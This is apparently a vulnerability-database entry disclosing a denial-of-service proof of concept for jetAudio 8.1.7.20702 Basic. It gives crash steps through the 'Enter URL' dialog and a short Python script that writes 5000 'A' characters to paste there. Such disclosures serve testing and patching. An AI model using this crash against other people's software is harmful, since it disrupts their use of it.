jetaudio 8.1.7.20702 basic enter url denial of service (poc)
▸▸▸ Exploit & Vulnerability >> dos exploit & windows vulnerability
#Exploit Title: jetAudio 8.1.7.20702 Basic - Denial of Service (PoC) #Discovery by: Victor Mondragón #Discovery Date: 2019-05-07 #Vendor Homepage: http://www.jetaudio.com/ #Software Link: http://www.jetaudio.com/download/ #Tested Version: 8.1.7.20702 #Tested on: Windows 7 Service Pack 1 x64 / Windows 10 Single Language x64 #Steps to produce the crash: #1.- Run python code: jetAudio_8.1.7.20702.py #2.- Open jetAudio.txt and copy content to clipboard #2.- Open jetAudio #3.- Select Menu > Basic Controls > Open URL... #4.- In "Enter URL" Paste ClipBoard after "http://" #5.- Click on "Ok" #6.- Crashed cod = "\x41" * 5000 f = open('jetAudio.txt', 'w') f.write(cod) f.close()
Jetaudio 8.1.7.20702 basic enter url denial of service (poc) Vulnerability / Exploit Source : Jetaudio 8.1.7.20702 basic enter url denial of service (poc)